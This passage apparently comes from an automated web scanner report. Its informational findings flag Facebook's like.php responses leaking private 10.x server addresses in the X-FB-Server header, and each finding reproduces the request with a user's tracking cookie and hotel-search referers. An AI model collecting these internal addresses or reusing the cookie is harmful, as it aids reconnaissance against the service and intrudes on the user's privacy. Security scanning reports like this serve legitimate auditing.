GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1826314c4%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff27211de94%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.155.75
X-Cnection: close
Date: Mon, 03 Oct 2011 00:35:51 GMT
Content-Length: 25826

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.103. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.156.49 (in the X-FB-Server response header)

Request

GET /plugins/like.php?api_key=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df349c46d4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.expedia.com%2FBoston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information%3Folacid%3Dhotel.brand.facebook.like&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.156.49
X-Cnection: close
Date: Mon, 03 Oct 2011 00:15:28 GMT
Content-Length: 31485

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.104. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.165.56 (in the X-FB-Server response header)

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162ece9ac%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff2555de2ec%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.165.56
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:45 GMT
Content-Length: 31042

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.105. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.62.147.44 (in the X-FB-Server response header)

Request

GET /plugins/like.php?locale=en_US&href=http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/&layout=button_count&show_faces=false&width=100&action=like&font=verdana&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.44
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:33 GMT
Content-Length: 23445

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.106. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.192.34 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.192.34
X-Cnection: close
Date: Mon, 03 Oct 2011 00:09:23 GMT
Content-Length: 23451

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.107. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.27.51.129 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=+&InDate=10/09/2011&OutDate=10/16/2011&NumRooms=1&sc=Away
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.51.129
X-Cnection: close
Date: Mon, 03 Oct 2011 00:37:39 GMT
Content-Length: 23393

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.108. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.62.113.49 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=www.facebook.com/bookingcom&layout=standard&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_hp HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.49
X-Cnection: close
Date: Mon, 03 Oct 2011 01:31:09 GMT
Content-Length: 25938

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.109. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.62.114.43 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=www.facebook.com/bookingcom&layout=button_count&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.114.43
X-Cnection: close
Date: Mon, 03 Oct 2011 01:02:09 GMT
Content-Length: 23606

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.110. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.186.23 (in the X-FB-Server response header)

Request

GET /plugins/like.php?app_id=178412055558267&href=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&send=false&layout=button_count&width=140&show_faces=false&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.23
X-Cnection: close
Date: Sun, 02 Oct 2011 23:57:56 GMT
Content-Length: 23424

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.111. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.43.20.67 (in the X-FB-Server response header)

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31af502d4%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff30dabeee4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.20.67
X-Cnection: close
Date: Mon, 03 Oct 2011 00:35:02 GMT
Content-Length: 25824

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.112. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.27.69.123 (in the X-FB-Server response header)

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9121af5%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff17fcfa228%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.69.123
X-Cnection: close
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 26049

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.113. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.62.95.44 (in the X-FB-Server response header)

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20cac3de8%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff7abffe4c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.44
X-Cnection: close
Date: Mon, 03 Oct 2011 00:58:06 GMT
Content-Length: 25825

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.114. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.193.30 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.193.30
X-Cnection: close
Date: Mon, 03 Oct 2011 00:11:18 GMT
Content-Length: 23325

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.115. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.62.96.57 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.96.57
X-Cnection: close
Date: Mon, 03 Oct 2011 01:02:25 GMT
Content-Length: 23565

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.116. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.27.84.111 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.84.111
X-Cnection: close
Date: Mon, 03 Oct 2011 00:40:33 GMT
Content-Length: 23322

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.117. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
